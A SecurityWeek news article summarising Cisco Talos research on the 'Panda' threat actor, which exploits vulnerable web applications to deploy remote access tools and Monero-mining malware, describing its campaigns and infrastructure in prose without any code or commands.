Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active, focused on persistently exploiting vulnerable web applications worldwide. The actor’s tools allow it to traverse networks, while the use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly and relies on exploits released by Shadow Brokers for infiltration, as well as the open-source credential-dumping application Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). A PowerShell exploit was used to download a miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).

Advertisement. Scroll to continue reading.

Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Certutil tool in Windows to download the secondary miner payload. Exploit modules designed for lateral movement were still used, many related to the NSA exploits.

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Understand how to go beyond effectively communicating new security strategies and recommendations.

Register

Join us for an in depth exploration of the critical nature of software and vendor supply chain security issues with a focus on understanding how attacks against identity infrastructure come with major cascading effects.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cybercrime

Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.